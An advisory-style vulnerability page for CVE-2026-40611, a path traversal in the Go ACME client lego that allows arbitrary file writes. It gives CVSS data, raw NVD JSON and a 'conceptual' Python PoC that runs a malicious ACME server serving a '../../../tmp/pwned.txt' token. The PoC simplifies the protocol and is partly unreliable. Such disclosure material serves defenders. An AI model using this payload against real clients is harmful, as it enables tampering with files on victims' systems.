CVE-2026-40611

Description

Let's Encrypt client and ACME library written in Go (Lego). Prior to 4.34.0, the webroot HTTP-01 challenge provider in lego is vulnerable to arbitrary file write and deletion via path traversal. A malicious ACME server can supply a crafted challenge token containing ../ sequences, causing lego to write attacker-influenced content to any path writable by the lego process. This vulnerability is fixed in 4.34.0.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

go-acme/lego < 4.34.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Conceptual PoC: Malicious ACME Server Response
# This is a simulation of how the vulnerability is triggered.

import http.server
import socketserver
import json

class MaliciousACMEServer(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        # Simulating a challenge request
        if ".well-known/acme-challenge/" in self.path:
            # The crafted token containing path traversal
            # e.g., writing to /tmp/pwned.txt
            malicious_token = "../../../tmp/pwned.txt"
            key_authorization = "attacker_controlled_content"
            
            self.send_response(200)
            self.send_header('Content-type', 'text/plain')
            self.end_headers()
            
            # In a real scenario, the client would write this to the path derived from the token
            print(f"[+] Sending malicious token: {malicious_token}")
            self.wfile.write(f"{{\"token\": \"{malicious_token}\", \"keyAuthorization\": \"{key_authorization}\"}}".encode())
        else:
            self.send_response(404)
            self.end_headers()

if __name__ == "__main__":
    PORT = 8080
    with socketserver.TCPServer(("", PORT), MaliciousACMEServer) as httpd:
        print(f"Serving malicious ACME response at port {PORT}")
        httpd.serve_forever()
# Note: This demonstrates the concept of the crafted payload.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-40611
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-40611
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-40611/
[4] VulDB https://vuldb.com/cve/CVE-2026-40611
[5] https://github.com/go-acme/lego/security/advisories/GHSA-qqx8-2xmm-jrv8
[6] https://github.com/go-acme/lego/security/advisories/GHSA-qqx8-2xmm-jrv8

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-40611", "sourceIdentifier": "[email protected]", "published": "2026-04-21T18:16:52.457", "lastModified": "2026-04-22T21:17:23.590", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Let's Encrypt client and ACME library written in Go (Lego). Prior to 4.34.0, the webroot HTTP-01 challenge provider in lego is vulnerable to arbitrary file write and deletion via path traversal. A malicious ACME server can supply a crafted challenge token containing ../ sequences, causing lego to write attacker-influenced content to any path writable by the lego process. This vulnerability is fixed in 4.34.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/go-acme/lego/security/advisories/GHSA-qqx8-2xmm-jrv8", "source": "[email protected]"}, {"url": "https://github.com/go-acme/lego/security/advisories/GHSA-qqx8-2xmm-jrv8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}